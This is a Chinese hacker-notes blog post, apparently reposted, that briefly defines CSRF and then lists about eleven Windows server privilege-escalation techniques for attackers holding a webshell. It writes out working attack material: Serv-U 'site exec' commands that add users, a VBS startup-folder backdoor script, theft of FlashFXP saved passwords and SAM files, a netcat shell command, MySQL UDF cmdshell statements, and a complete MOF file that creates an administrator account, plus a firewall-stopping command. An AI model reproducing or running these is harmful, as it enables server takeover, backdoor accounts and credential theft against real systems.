Hacker_笔记_业内术语

参考链接:

http://bbs.51cto.com/thread-623419-1.html

CSRF:

跨站请求伪造

依靠用户标识危害网站
利用网站对用户标识的信任
欺骗用户的浏览器发送HTTP请求给目标站点
另外可以通过IMG标签会触发一个GET请求,可以利用它来实现CSRF攻击。
 
提权:
提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升 WEBSHELL权限以夺得该服务器权限。
 
提权的主要方法有以下几种:

第一

如果服务器上有装了 pcanywhere服务端,管理员为了管理方便
也给了我们方便,到 系统盘的Documents and Settings/All Us
ers/Application Data/Symantec/ pcAnywhere/中下载*.cif本地
破解就使用pcanywhere连接就可以了。

第二

一般服务器的管理都是本机设计完毕然后上传到空间里,
那么就会用到ftp,服务器使用最多的就是 servu
那么我们就利用servu来 提升权限
通过servu提升权限需要servu 安装目录可写~
好开始把,首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载
下来,然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖,
启动servu添加了一个用户,设置为 系统管理员,目录C:\,具有可执行权限
然后去 servu安装目录里把ServUDaemon.ini更换服务器上的。
用我新建的用户和密码连接
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //刚才添加的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录
250 Directory changed to /WINNT
ftp>cd system32 //进入 system32目录
250 Directory changed to / WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe
文件加用户。
如果提示没有权限,那我们就
把后门(server.exe) 传他system32目录
然后写一个 VBs脚本
set wshshell=createobject ("wscript.shell")
a=wshshell.run (" cmd.exe /c net user user pass /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0)
b=wshshell.run ("cmd.exe /c server.exe",0)
存为xx.vbe
这个脚本的作用是建立user用户密码为pass
并且提升为管理员
然后执行 system32目录下的server.exe
把这个教本传他 C:\Documents and Settings\All Users\ 「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本.
接下来就是等了.等他登陆.

第三

就是先检查有什么 系统服务,或者随系统启动自动启动的程序和管理员经常使用的软件, 比如 诺顿,VAdministrator,金山,瑞星, WinRAR甚至QQ之类的,是否可以写,如果可以就修改其程序, 绑定一个 批处理或者 VBS,然后还是等待服务器重启。

第四

查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码,可能会有所
收获等等。

第五

使用 Flashfxp也能 提升权限,但是成功率就看你自己的运气了
首先找到 FlashFXP文件夹,打开(编辑)Sites. dat,这个文件这是什么东西密码和用户名,
而且密码是加了密的。 如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件。然后会发现 打开 flashfxp在站点中打开站点管理器一样。又可以添加N多 肉鸡啦~~嘻嘻~
唔??不对啊,是来提升权限的啊,晕,接着来别半途而废。
大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。经过用xp 星号密码查看器查看,然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示, 然后最终把这个网站管理员的密码从这堆东西中找
出来。那么下一步就可以链接这些新的服务器啦~~
经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地
还原对方管理员的各个站点的密码。

第六

WIN2K+IIS5.0默认情况下应用程序保护选项是"中(共用的)",这时 IIS加载 isapi是用的
iwam_computername用户身份执行。
但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、
win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名,并且没有做目录限制,
以SYSTEM权限加载的isapi有:
1、 idq.dll
2、 httpext.dll
3、 httpodbc.dll
4、 ssinc.dll
5、 msw3prt.dll
6、 author.dll
7、 admin.dll
8、 shtml.dll
9、 sspifilt.dll
10、compfilt.dll
11、pwsdata.dll
12、md5filt.dll
13、fpexedll.dll
所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个 bug,比如请求/scripts/test%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双 字节的 远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题,就是"/"、"\"只识别了一个 "/",所以如果请求里面使用"\",就会错误的处理包含文件路径,有可能泄露东西或者出现权限 漏洞,这种漏洞很多别的地方( php、asp等)也还存在。
加载这些 isapi不是单以文件名做依据了,而是加了路径,应该是修正了此问题。
一般默认情况下是:
1、 idq.dlld:\winnt\ system32\idq.dll
2、 httpext.dll d:\winnt\system32\inetsrv\httpext.dll
3、 httpodbc.dll d:\winnt\system32\inetsrv\httpodbc.dll
4、 ssinc.dll d:\winnt\system32\inrtsrv\ssinc.dll
5、 msw3prt.dll d:\winnt\system32\msw3prt.dll
6、 author.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll
7、 admin.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll
8、 shtml.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\ isapi\shtml.dll
9、 sspifilt.dll d:\winnt\ system32\inetsrv\sspifilt.dll
10、compfilt.dll d:\winnt\system32\inetsrv\compfilt.dll
11、pwsdata.dll d:\winnt\system32\inetsrv\pwsdata.dll
12、md5filt.dll d:\winnt\system32\inetsrv\md5filt.dll
13、fpexedll.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll
正常情况下这些路径都guest不能写,但如果配置不好,这些路径iis user能够写了就一样可以 提升权限
可以把ISAPIHack.dll上传到 IIS的可执行目录,文件名可叫ssinc.dll或者admin.dll等(上面列的13个文件名之一)。
然后等待IIS重启加载此dll,就可以获得权限了

第七

下载系统的 %windir%\repair\sam.*(WinNT 4下是sam._ 而Windows 2000下是sam)文件,
然后用L0pht等软件进行破解,只要能拿到,肯花时间,就一定可以破解。

第八

PipeUpAdmin(Windows 2000下), 在本机运行可以把当前用户帐号加入管理员组。普通用户和Guests组用户都可以成功运行。

第九

Serv-u Ftp Server 本地权限提升漏洞:
很多主机的C:\Documents and Settings\All Users\ Documents目录以及下边几个子目录Documents没有设置权限,导致可以在这个目录上传并运行Exp. 直接上传了 serv-u local exploit 和nc, 并且把serv-u的本地 提升权限的名字命名为su.exe 文件就放在C:\Documents and Settings\All Users\ Documents, 然后我们用su.exe直接建立用户,也可以反弹一个shell过来的。
具体命令:
建立用户: serv-u.exe "cmd"
>USER xl
>PASS 111111
反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

第十

udf提权。利用条件: root权限的mysql账号密码。提权方法:具体语句如下:
  create function cmdshell returns string soname 'udf.dll';
  select cmdshell(’net user iis_user 123 /add’);
  select cmdshell(’net localgroup administrators iis_user /add’);
  select cmdshell(’regedit /s d:\web\3389.reg’);
  drop function cmdshell;
  select cmdshell(’netstat -an’);

第十一

mof提权。
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
  {
  EventNamespace = "Root\\Cimv2";
  Name = "filtP2";
  Query = "Select * From __InstanceModificationEvent "
  "Where TargetInstance Isa \"Win32_LocalTime\" "
  "And TargetInstance.Second = 5";
  QueryLanguage = "WQL";
  };
instance of ActiveScriptEventConsumer as $Consumer
  {
  Name = "consPCSV2";
  ScriptingEngine = "JScript";
  ScriptText =
  "var WSH = new ActiveXObject(\" WScript.Shell\")\nWSH.run(\" net.exe user admin admin /add\")";
  };
instance of __FilterToConsumerBinding
  {
  Consumer = $Consumer;
  Filter = $EventFilter;
  };

  关闭防火墙服务 net stop "Windows Firewall/Internet Connection Sharing (ICS)"

  以上保存为xxx.mof
  1.找个可写目录,上传mof文件
  2.执行sql
  select load_file('C:\\ RECYCLER\\nullevt.mof') into
  dumpfile 'c:/windows/ system32/ wbem/mof/nullevt.mof';
 
TapJacking  触屏劫持

转载于:https://www.cnblogs.com/HackHer/p/5068026.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值